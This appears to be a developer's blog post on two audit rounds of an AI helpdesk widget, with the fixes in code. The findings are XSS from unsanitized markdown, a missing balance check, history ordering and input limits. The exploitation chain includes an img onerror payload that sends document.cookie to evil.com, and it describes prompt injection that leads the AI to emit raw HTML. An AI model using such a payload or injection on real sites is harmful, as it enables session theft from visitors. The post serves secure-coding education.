I built the helpdesk widget. Nine files, two database tables, a public streaming endpoint, a Svelte 5 chat component, and an admin dashboard. The build passed. The feature worked. I was confident.
Then the first auditor opened HelpdeskWidget.svelte at line 348 and found this:
```svelte
{@html renderMd(msg.content || '')}
```

Where renderMd was:

```typescript
function renderMd(text: string): string {
  return marked.parse(text) as string;
}
```

No sanitization. On a public, unauthenticated endpoint.
Critical 1: XSS via Unsanitized Markdown
The chain of exploitation is straightforward:
- A visitor types a message designed to make the AI include specific HTML in its response
- The AI is generally resistant to outputting raw HTML, but it is not immune -- particularly with creative prompt injection
- marked.parse() converts markdown to HTML, including any raw HTML the AI outputs
- {@html} in Svelte injects that HTML into the DOM without escaping
- <img src=x onerror="document.location='https://evil.com?c='+document.cookie"> executes
The attack is not theoretical. marked is designed to render HTML -- it passes through <script>, <img onerror>, <svg onload>, and every other XSS vector. The {@html} directive in Svelte explicitly bypasses Svelte's built-in escaping. Together, they create an injection path from AI output to DOM execution.
On the existing chat endpoint, this is less concerning -- the user is authenticated and only sees their own AI responses. On the helpdesk, the endpoint is public. Any visitor can craft messages. The AI's response is rendered in every subsequent visitor's browser if they resume the same conversation from localStorage.
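To make the escaping point concrete, here is a minimal sketch of what entity-escaping does to the payload from the list above. The escapeHtml helper is a hypothetical stand-in written for illustration, not Svelte's actual implementation. It only shows why an escaped string reaches the DOM as inert characters, while the same string passed through {@html} is parsed as markup.

```typescript
// Hypothetical helper for illustration only; not Svelte's internal escaping code.
function escapeHtml(text: string): string {
  return text
    .replace(/&/g, '&amp;') // must run first so later entities are not double-escaped
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// The payload from the exploitation chain above.
const payload = `<img src=x onerror="document.location='https://evil.com?c='+document.cookie">`;

// Escaped, the string contains no tag delimiters, so a browser renders it as text.
const escapedPayload = escapeHtml(payload);
console.log(escapedPayload);
```

Escaping everything would also destroy the legitimate HTML that marked produces, which is why the fix below sanitizes the rendered HTML instead of escaping it.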
The Fix
```typescript
import DOMPurify from 'isomorphic-dompurify';

function renderMd(text: string): string {
  const html = marked.parse(text) as string;
  return DOMPurify.sanitize(html);
}
```

DOMPurify strips event handlers (onerror, onload, onclick), removes <script> tags, sanitizes <iframe> embeds, and cleans other dangerous patterns while preserving safe HTML -- paragraphs, headings, lists, code blocks, links, tables. The output of marked.parse() becomes safe for {@html}.
isomorphic-dompurify was chosen over dompurify because the widget component runs through SvelteKit's SSR path. The isomorphic wrapper provides a jsdom-based implementation for the server and the native browser implementation for the client. The jsdom dependency adds 8.2 MB to node_modules but does not appear in the client bundle -- Vite tree-shakes it out.
Why I Missed It
I wrote {@html renderMd(...)} because the existing AIChatSection component on the homepage uses the same pattern for rendering markdown. That component is a demo -- it renders hardcoded strings, not AI output. My mental model was "this is how we render markdown in this codebase."
The auditor had no such mental model. They saw {@html} combined with user-influenced content and flagged it immediately. The directive is a well-known XSS vector in Svelte; any code review checklist includes "verify all {@html} sources are sanitized."
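The checklist item can be partly mechanized. The sketch below is a hypothetical helper, not something from this codebase: it scans component source for {@html ...} and flags every expression that does not start with a call to a wrapper you have declared trusted. The names findUnsanitizedHtml and sanitizeMd are assumptions for illustration. It is a heuristic only: it cannot tell whether a trusted wrapper really sanitizes, and the simple pattern does not handle expressions that contain a closing brace.

```typescript
interface HtmlDirectiveFinding {
  line: number;       // 1-based line number in the scanned source
  expression: string; // the expression passed to {@html}
}

// Hypothetical review aid: list {@html} usages not wrapped in a trusted function.
function findUnsanitizedHtml(source: string, trustedWrappers: string[]): HtmlDirectiveFinding[] {
  const findings: HtmlDirectiveFinding[] = [];
  const lines = source.split('\n');
  for (let i = 0; i < lines.length; i++) {
    // A fresh regex per line keeps the global-match cursor from leaking between lines.
    const pattern = /\{@html\s+([^}]+)\}/g;
    let match: RegExpExecArray | null;
    while ((match = pattern.exec(lines[i])) !== null) {
      const expression = match[1].trim();
      const trusted = trustedWrappers.some((name) => expression.indexOf(name + '(') === 0);
      if (!trusted) {
        findings.push({ line: i + 1, expression });
      }
    }
  }
  return findings;
}
```

Run against the widget as originally written, with only a sanitizing wrapper on the trusted list, the renderMd call at line 348 would be reported.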
Critical 2: No Balance Check Before API Call
The helpdesk endpoint billed the site owner's account. The flow was:
1. Receive visitor message
2. Stream AI response from Anthropic
3. Save messages to database
4. Call deductTokens(accountId, ...) to charge the owner
Step 4 existed. Step 0 -- checkBalance(accountId, ...) -- did not.
Without the balance check, the helpdesk would continue calling the Anthropic API and streaming responses even when the site owner's wallet was empty. Each conversation would deduct tokens, pushing the balance further negative. There was no floor.
The existing chat endpoint has this check at line 86:
```typescript
const balance = await checkBalance(account.id, isByok);
if (!balance.allowed) {
  return json({ error: balance.reason }, { status: 402 });
}
```

I copied the streaming logic from the chat endpoint. I copied the tool execution loop, the SSE event format, the token counting, the deductTokens call. I did not copy the balance check because it appeared before the streaming section -- in the authentication block that the helpdesk endpoint does not have.
The auditor found it by following the billing flow: "Where are tokens deducted? Is there a check before the deduction? There is not." A systematic question that the builder skipped because the builder was thinking about streaming, not billing.
The Fix
```typescript
// Check billing balance before calling the API
const balance = await checkBalance(accountId, false);
if (!balance.allowed) {
  return json({ error: 'Helpdesk temporarily unavailable.' }, { status: 503 });
}
```

The error message is deliberately vague. A public visitor should not learn that the site owner has insufficient AI credits. "Temporarily unavailable" communicates the right information (try again later) without leaking billing state.
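The ordering matters more than the check itself, so here is a minimal sketch of the corrected flow. Everything in it is a hypothetical stand-in: the real checkBalance and deductTokens are async and backed by the database, and their exact signatures are not shown in this article. The stubs are synchronous and use an in-memory wallet so the order of operations is easy to follow.

```typescript
type BalanceResult = { allowed: boolean; reason?: string };

// Hypothetical in-memory wallet standing in for the billing tables.
const wallet: { [accountId: string]: number } = { 'acct-funded': 500, 'acct-empty': 0 };
let apiCalls = 0; // counts how often the (stubbed) model API is hit

function checkBalanceStub(accountId: string): BalanceResult {
  const balance = wallet[accountId] ?? 0;
  return balance > 0 ? { allowed: true } : { allowed: false, reason: 'insufficient balance' };
}

function deductTokensStub(accountId: string, tokens: number): void {
  wallet[accountId] = (wallet[accountId] ?? 0) - tokens;
}

function callModelStub(message: string): { reply: string; tokensUsed: number } {
  apiCalls += 1;
  return { reply: 'echo: ' + message, tokensUsed: 50 };
}

function handleHelpdeskMessage(accountId: string, message: string): { status: number; body: string } {
  // Step 0: refuse before any billable work happens.
  const balance = checkBalanceStub(accountId);
  if (!balance.allowed) {
    return { status: 503, body: 'Helpdesk temporarily unavailable.' };
  }
  // Billable work, then the deduction.
  const result = callModelStub(message);
  deductTokensStub(accountId, result.tokensUsed);
  return { status: 200, body: result.reply };
}
```

With the check first, an empty wallet gets a 503 before the model is ever called, so new conversations cannot push the balance further negative.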
The Important Findings
The first audit found two more issues at the Important level:
History Retrieval Order
The original code loaded conversation history like this:
```typescript
const history = await prisma.helpdeskMessage.findMany({
  where: { conversationId: conversation.id },
  orderBy: { createdAt: 'asc' },
  take: MAX_CONTEXT_MESSAGES,
  select: { role: true, content: true },
});
```

orderBy: 'asc' with take: 20 returns the first 20 messages. For a conversation with 30 messages, the AI would see messages 1-20 and miss messages 21-30 -- the most recent and most relevant context.
The fix was orderBy: 'desc' (get the last 20), then .reverse() (put them in chronological order for the API).
```typescript
const historyDesc = await prisma.helpdeskMessage.findMany({
  where: { conversationId: conversation.id },
  orderBy: { createdAt: 'desc' },
  take: MAX_CONTEXT_MESSAGES,
  select: { role: true, content: true },
});
const history = historyDesc.reverse();
```

I wrote orderBy: 'asc' because I wanted chronological order. I forgot that take keeps the first N rows of the sorted result, so ascending order returns the oldest messages, not the newest. The code did what I told it to do, not what I intended.
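The difference between the two queries can be reproduced with plain arrays, no database needed. This is a sketch under assumptions: StoredMessage, takeAscending, takeLatestChronological, and makeConversation are hypothetical names, and sort plus slice stands in for Prisma's orderBy plus take.

```typescript
interface StoredMessage {
  id: number;
  createdAt: number; // timestamp in milliseconds
}

// Mimics orderBy: asc + take: n. Keeps the OLDEST n messages.
function takeAscending(messages: StoredMessage[], n: number): StoredMessage[] {
  return messages.slice().sort((a, b) => a.createdAt - b.createdAt).slice(0, n);
}

// Mimics orderBy: desc + take: n, then reverse(). Keeps the NEWEST n, oldest first.
function takeLatestChronological(messages: StoredMessage[], n: number): StoredMessage[] {
  return messages
    .slice()
    .sort((a, b) => b.createdAt - a.createdAt)
    .slice(0, n)
    .reverse();
}

// Builds a conversation with ids 1..count and strictly increasing timestamps.
function makeConversation(count: number): StoredMessage[] {
  const out: StoredMessage[] = [];
  for (let i = 1; i <= count; i++) {
    out.push({ id: i, createdAt: i * 1000 });
  }
  return out;
}
```

For a 30-message conversation and n = 20, takeAscending returns ids 1 through 20, while takeLatestChronological returns ids 11 through 30 in chronological order.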
Input Length Validation
The endpoint accepted sessionId without a length limit. The session ID is used as a key in the in-memory rate limiter Map. An attacker sending requests with unique 10,000-character session IDs could exhaust server memory -- not quickly, but steadily.
Similarly, visitorName, visitorEmail, and pageUrl were stored in PostgreSQL without length validation. SQL injection is not the concern here, since these values go through Prisma's query API, but storing arbitrarily long strings wastes database space and could cause UI issues in the admin dashboard.
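To put rough numbers on the session ID concern, here is a small simulation. It is a sketch under assumptions: createLimiter and simulateAttack are hypothetical, the real rate limiter is not shown in this article, and counting retained key characters is only a proxy for actual memory use. The maxKeyLength parameter models a length guard on the key.

```typescript
// Hypothetical stand-in for an in-memory rate limiter keyed by session ID.
function createLimiter(maxKeyLength: number) {
  const hits = new Map<string, number>();
  return {
    // Returns false when the session ID is rejected for being too long.
    record(sessionId: string): boolean {
      if (sessionId.length > maxKeyLength) return false;
      hits.set(sessionId, (hits.get(sessionId) ?? 0) + 1);
      return true;
    },
    // Total characters held as Map keys: a rough proxy for retained memory.
    retainedKeyChars(): number {
      let total = 0;
      hits.forEach((_count, key) => {
        total += key.length;
      });
      return total;
    },
  };
}

// Sends `requests` unique session IDs, each exactly `idLength` characters long.
function simulateAttack(
  limiter: ReturnType<typeof createLimiter>,
  requests: number,
  idLength: number
): number {
  for (let i = 0; i < requests; i++) {
    const prefix = String(i); // the counter makes every ID unique
    const padding = new Array(idLength - prefix.length + 1).join('x');
    limiter.record(prefix + padding);
  }
  return limiter.retainedKeyChars();
}
```

With no effective limit, 1,000 requests carrying 10,000-character IDs leave 10,000,000 key characters in the Map. With a 100-character guard, the same traffic leaves none.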
The fix was a length check on sessionId and straightforward truncation for the other fields:
```typescript
if (sessionId.length > 100) return json({ error: '...' }, { status: 400 });
const sanitizedName = typeof visitorName === 'string' ? visitorName.slice(0, 100) : null;
const sanitizedEmail = typeof visitorEmail === 'string' ? visitorEmail.slice(0, 254) : null;
const sanitizedPageUrl = typeof pageUrl === 'string' ? pageUrl.slice(0, 2000) : null;
```

Round 2: The Admin Endpoints
The second auditor verified all Round 1 fixes and then turned attention to the code the first auditor spent less time on: the admin endpoints.
Two new Important findings:
- Admin search parameter unbounded: The search query parameter was passed directly to Prisma contains queries without length limits. A 100KB search string would cause database performance degradation. Fix: .slice(0, 200).
- Admin transcript unlimited: The transcript endpoint returned all messages in a conversation without pagination. A conversation at the 200-message cap would return a large payload. Fix: take: 200 on the messages include.
Neither finding is a security vulnerability. Both are robustness issues that would surface under adversarial or extreme usage. The Round 2 auditor found them because they were specifically looking at the admin surface -- an area the Round 1 auditor deprioritized in favor of the public-facing attack surface.
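Both Round 2 fixes amount to putting an explicit bound on something that was previously unbounded. A minimal sketch, assuming hypothetical helper names (clampSearch, buildTranscriptQuery) and a guessed query shape: the relation name messages and the createdAt ordering are assumptions, not the actual admin endpoint code.

```typescript
const MAX_SEARCH_LENGTH = 200;
const MAX_TRANSCRIPT_MESSAGES = 200;

// Bounds the admin search term before it reaches a `contains` filter.
function clampSearch(raw: string | null): string | undefined {
  if (raw === null || raw.length === 0) return undefined;
  return raw.slice(0, MAX_SEARCH_LENGTH);
}

// Builds a plain object in the shape of a findUnique-style argument with a
// capped messages include. Nothing here talks to a database.
function buildTranscriptQuery(conversationId: string) {
  return {
    where: { id: conversationId },
    include: {
      messages: {
        orderBy: { createdAt: 'asc' },
        take: MAX_TRANSCRIPT_MESSAGES, // explicit ceiling on the payload size
      },
    },
  };
}
```

Keeping the limits as named constants makes the ceiling visible at the call site, which is what the next auditor will look for.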
The Scorecard
| Metric | Value |
|---|---|
| Files audited | 9 new/modified + 2 reference |
| Audit sessions | 2 |
| Critical findings | 2 |
| Important findings | 4 |
| Minor findings | 7 |
| Pre-existing issues fixed | 4 (TypeScript errors in chat endpoint) |
| Regressions | 0 |
| New dependencies | 1 (isomorphic-dompurify) |
| Build status after all fixes | Passes |
The Pattern
After audits of six CLI phases and one helpdesk widget, a pattern has emerged in what builders miss:
Builders think in flows. Message in, AI processes, response out. The flow works. The builder moves on.
Auditors think in surfaces. What enters the system? What leaves the system? What is trusted? What is not? The XSS finding came from asking "what HTML can reach the DOM?" The billing finding came from asking "what happens before money is spent?"
Builders inherit assumptions from reference code. I copied the streaming loop from the chat endpoint. The chat endpoint is authenticated -- XSS is a lower concern. The helpdesk endpoint is public -- XSS is critical. The code is the same, but the security context changed. I did not re-evaluate the assumptions.
Auditors have no reference code. They read what exists, not what it was derived from. The absence of DOMPurify is visible. The absence of checkBalance is visible. They are not comparing to the chat endpoint -- they are evaluating the helpdesk endpoint on its own terms.
This is why two sessions find what one session cannot. Not because the auditor is smarter. Because the auditor is differently positioned. The methodology is the multiplier.
This concludes the AI Helpdesk Widget series. The feature is live on sh0.dev -- try it by clicking the chat button in the bottom-right corner of any marketing page.